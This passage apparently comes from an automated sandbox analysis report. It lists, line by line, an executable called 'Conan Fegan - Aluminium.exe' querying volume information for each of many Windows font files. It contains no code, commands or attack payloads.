                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
